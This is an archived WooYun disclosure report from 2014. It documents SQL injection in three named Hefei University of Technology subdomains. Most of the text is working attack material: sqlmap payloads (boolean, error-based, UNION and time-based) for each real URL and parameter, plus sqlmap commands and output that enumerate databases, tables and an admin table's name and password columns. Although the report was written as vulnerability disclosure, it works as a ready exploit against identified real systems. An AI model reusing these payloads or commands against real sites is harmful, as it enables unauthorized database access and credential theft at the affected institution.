乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-05: 细节已通知厂商并且等待厂商处理中 2014-06-10: 厂商已经主动忽略漏洞,细节向公众公开
合肥工业大学某分站#Mysql Injection
Mysql Injection地址:第一处:
http://cadcg.hfut.edu.cn/allurl114.php?id=201104210
---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=201104210 AND 3010=3010 Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: id=201104210 UNION ALL SELECT NULL,NULL,CONCAT(0x7176776971,0x456c5a414a485a42786c,0x7172776571),NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=201104210 AND SLEEP(5)---
第二处:
http://qls.hfut.edu.cn/imagedetails.php?id=115
---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=115 AND 8380=8380 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=115 AND (SELECT 3165 FROM(SELECT COUNT(*),CONCAT(0x7169617871,(SELECT (CASE WHEN (3165=3165) THEN 1 ELSE 0 END)),0x7161686571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 17 columns Payload: id=-4983 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7169617871,0x5757754e424f4c564454,0x7161686571),NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=115 AND SLEEP(5)---
第三处:
http://jpkc.hfut.edu.cn/2008/dlfx/bencandy.php?id=491
---Place: GETParameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=491' AND (SELECT 2063 FROM(SELECT COUNT(*),CONCAT(0x71787a7871,(SELECT (CASE WHEN (2063=2063) THEN 1 ELSE 0 END)),0x7176737471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GPRn'='GPRn Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=491' AND SLEEP(5) AND 'AWzr'='AWzr---
第一处:#1、获取数据库:
sqlmap -u http://cadcg.hfut.edu.cn/allurl114.php?id=201104210 --dbs
available databases [2]:[*] c231cadcg[*] information_schema
#2、获取表段:
sqlmap -u http://cadcg.hfut.edu.cn/allurl114.php?id=201104210 -D c231cadcg --tables
Database: c231cadcg[3 tables]+---------+| dynamic || mynews || xietong |+---------+
第二处:#1、获取数据库:
sqlmap -u http://qls.hfut.edu.cn/imagedetails.php?id=115 --dbs
available databases [2]: [*] c257qls[*] information_schema
sqlmap -u http://qls.hfut.edu.cn/imagedetails.php?id=115 -D c257qls --tables
Database: c257qls [16 tables]+---------------+| user || admin || article || index_pic || jgsz || jgxy || kefu || link || lwupload || product_types || qq || szdw_up_file || teacher || types || udf_temp || upload |+---------------+
#3、获取字段:
sqlmap -u http://qls.hfut.edu.cn/imagedetails.php?id=115 -D c257qls -T admin --columns
Database: c257qls Table: admin[3 columns]+--------+----------------------+| Column | Type |+--------+----------------------+| id | int(11)\\?a0unsigned || name | varchar(30) || pwd | varchar(30) |+--------+----------------------+
第三处:#1、获取数据库:
sqlmap -u http://jpkc.hfut.edu.cn/2008/dlfx/bencandy.php?id=491 --dbs
available databases [2]:[*] computer[*] information_schema
sqlmap -u http://jpkc.hfut.edu.cn/2008/dlfx/bencandy.php?id=491 -D computer --tables
Database: computer[162 tables]+---------------------+| Admin || MailBox || admin || alumni || alumni_board || alumni_user || article || bbs_admin_logs || bbs_admin_sessions || bbs_badwords || bbs_cache_store || bbs_calendar_events || bbs_categories || bbs_contacts || bbs_css || bbs_email_logs || bbs_emoticons || bbs_faq || bbs_forum_perms || bbs_forum_tracker || bbs_forums || bbs_groups || bbs_languages || bbs_leagues || bbs_macro || bbs_macro_name || bbs_member_extra || bbs_members || bbs_messages || bbs_moderator_logs || bbs_moderators || bbs_pfields_content || bbs_pfields_data || bbs_polls || bbs_posts || bbs_reg_antispam || bbs_sale || bbs_search_results || bbs_sessions || bbs_skin_templates || bbs_skins || bbs_spider_logs || bbs_stats || bbs_templates || bbs_titles || bbs_tmpl_names || bbs_topic_mmod || bbs_topics || bbs_tracker || bbs_validating || bbs_voters || bbs_warn_logs || bookmaking || box || class || department || discourse_release || eduresearch || file || honor || ialab_achievement || ialab_admin || ialab_lecture || ialab_news || ialab_patent || ialab_product || ialab_result || ialab_team || lfj_ad || lfj_artic || lfj_artic_100 || lfj_artic_101 || lfj_artic_down || lfj_artic_flash || lfj_artic_flea || lfj_artic_msg || lfj_artic_shop || lfj_artic_song || lfj_artic_video || lfj_bak || lfj_channel || lfj_comment || lfj_config || lfj_credits || lfj_download || lfj_downusr || lfj_favorite || lfj_hack || lfj_hack_adminwork || lfj_keywords || lfj_label || lfj_link || lfj_medalinfo || lfj_medalusr || lfj_membercredit || lfj_memberinfo || lfj_members || lfj_mgroup || lfj_mgroup_sort || lfj_msg || lfj_msgfriend || lfj_online || lfj_order || lfj_poll || lfj_reply || lfj_setmemberinfo || lfj_sort || lfj_sortmsg || lfj_stat || lfj_top || lfj_vote || mailadmin || map || message || news || news_adminlog || news_article || news_articlerate || news_articletext || news_cache || news_comment || news_favorite || news_gallery || news_loginlog || news_manager || news_message || news_news || news_relatedlink || news_replacement || news_replacementset || news_session || news_setting || news_settinggroup || news_sort || news_style || news_template || news_templateset || news_user || news_useractivation || news_usergroup || newsclasssub || power || scienceresearch || soc_labInfo || soc_labShortInfo || soc_members || soc_news_pic || soc_news_text || soc_papers || soc_project || soc_research || soc_resource || soc_seminar || soc_student || soc_teacher || soc_teaching || soc_user || specialty_class || specialty_detail || staffroom || teacher_class || teacher_detail |+---------------------+
有礼物么?:)
危害等级:无影响厂商忽略
忽略时间:2014-06-10 10:41
暂无
